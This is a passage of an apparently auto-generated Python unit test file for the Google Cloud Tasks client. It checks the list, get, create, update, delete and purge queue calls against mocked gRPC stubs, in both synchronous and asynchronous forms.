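#   client.list_queues(request=cloudtasks.ListQueuesRequest())        # ok
#   client.list_queues(parent="projects/p/locations/l")               # ok
#   client.list_queues(cloudtasks.ListQueuesRequest(), parent="...")  # ValueError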
@pytest.mark.asyncio
async def test_list_queues_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
@pytest.mark.asyncio
async def test_list_queues_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
def test_list_queues_pager():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
metadata = (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_queues(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, queue.Queue) for i in results)
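# In application code the pager is consumed the same way: iterating it
# fetches pages lazily and yields individual Queue messages. Sketch,
# assuming a real client and a valid parent resource name:
#
#   for q in client.list_queues(parent="projects/my-project/locations/us-central1"):
#       print(q.name)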
def test_list_queues_pages():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = list(client.list_queues(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_queues_async_pager():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
async_pager = await client.list_queues(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, queue.Queue) for i in responses)
@pytest.mark.asyncio
async def test_list_queues_async_pages():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_queues(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
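# The async surface mirrors the sync pager with "async for"; a sketch,
# assuming an event loop and real credentials:
#
#   pager = await client.list_queues(parent="projects/my-project/locations/us-central1")
#   async for q in pager:
#       print(q.name)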
def test_get_queue(transport: str = "grpc", request_type=cloudtasks.GetQueueRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_get_queue_from_dict():
test_get_queue(request_type=dict)
@pytest.mark.asyncio
async def test_get_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.GetQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_get_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_queue), "__call__") as call:
call.return_value = queue.Queue()
client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_get_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_get_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
def test_create_queue(
transport: str = "grpc", request_type=cloudtasks.CreateQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_create_queue_from_dict():
test_create_queue(request_type=dict)
@pytest.mark.asyncio
async def test_create_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.CreateQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
)
)
response = await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_create_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].queue == gct_queue.Queue(name="name_value")
def test_create_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].queue == gct_queue.Queue(name="name_value")
@pytest.mark.asyncio
async def test_create_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
def test_update_queue(
transport: str = "grpc", request_type=cloudtasks.UpdateQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_update_queue_from_dict():
test_update_queue(request_type=dict)
@pytest.mark.asyncio
async def test_update_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.UpdateQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.update_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
)
)
response = await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_update_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.update_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.update_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
def test_update_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].queue == gct_queue.Queue(name="name_value")
assert args[0].update_mask == field_mask.FieldMask(paths=["paths_value"])
def test_update_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.update_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].queue == gct_queue.Queue(name="name_value")
assert args[0].update_mask == field_mask.FieldMask(paths=["paths_value"])
@pytest.mark.asyncio
async def test_update_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
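# A flattened update pairs the queue with a FieldMask naming the fields to
# change; a sketch (the queue name and mask path are placeholders):
#
#   client.update_queue(
#       queue=gct_queue.Queue(name="projects/p/locations/l/queues/q"),
#       update_mask=field_mask.FieldMask(paths=["rate_limits"]),
#   )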
def test_delete_queue(
transport: str = "grpc", request_type=cloudtasks.DeleteQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_queue_from_dict():
test_delete_queue(request_type=dict)
@pytest.mark.asyncio
async def test_delete_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.DeleteQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_delete_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_queue), "__call__") as call:
call.return_value = None
client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_delete_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_delete_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
def test_purge_queue(
transport: str = "grpc", request_type=cloudtasks.PurgeQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_purge_queue_from_dict():
test_purge_queue(request_type=dict)
@pytest.mark.asyncio
async def test_purge_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.PurgeQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.purge_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_purge_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.purge_queue), "__call__") as call:
call.return_value = queue.Queue()
client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.purge_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_purge_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_purge_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_purge_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
